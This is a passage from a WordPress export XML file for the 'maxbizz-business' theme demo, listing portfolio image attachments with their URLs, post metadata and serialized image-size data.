		<pubDate>Fri, 11 Sep 2020 04:32:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-10.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>800</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:32:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:32:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-10]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>797</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-10.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-10.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:24:"2020/09/project-10.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"project-10-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"project-10-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"project-10-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"project-10-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"project-10-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-12</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-planning/project-12/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-12.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>803</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-12]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>802</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-12.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-12.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:24:"2020/09/project-12.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"project-12-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"project-12-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"project-12-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"project-12-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"project-12-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-11</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/money-market/project-11/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-11.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>807</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-11]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>806</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-11.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-11.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:24:"2020/09/project-11.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"project-11-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"project-11-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"project-11-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"project-11-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"project-11-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-9</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/oct-analytics/project-9/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-9.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>811</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-9]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>810</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-9.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-9.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:23:"2020/09/project-9.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-9-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-9-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-9-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-9-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-9-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/financial-statements/project-8/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>815</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>814</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:769;s:4:"file";s:23:"2020/09/project-8.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-8-1-236x300.jpg";s:5:"width";i:236;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-8-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-8-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-8-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-8-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/insurance-finance/project-7/</link>
		<pubDate>Fri, 11 Sep 2020 04:47:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>819</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:47:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:47:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>818</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:23:"2020/09/project-7.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-7-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-7-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-7-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-7-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-7-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/project-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:01:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>823</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:01:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:01:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>822</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:736;s:4:"file";s:23:"2020/09/project-5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-5-1-247x300.jpg";s:5:"width";i:247;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-5-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-5-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/project-6/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>827</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:23:"2020/09/project-6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-6-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-6-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-6-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-6-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-6-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/project-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>831</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:797;s:4:"file";s:23:"2020/09/project-4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-4-1-271x300.jpg";s:5:"width";i:271;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-4-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-4-1-719x600.jpg";s:5:"width";i:719;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/project-slide-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>832</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
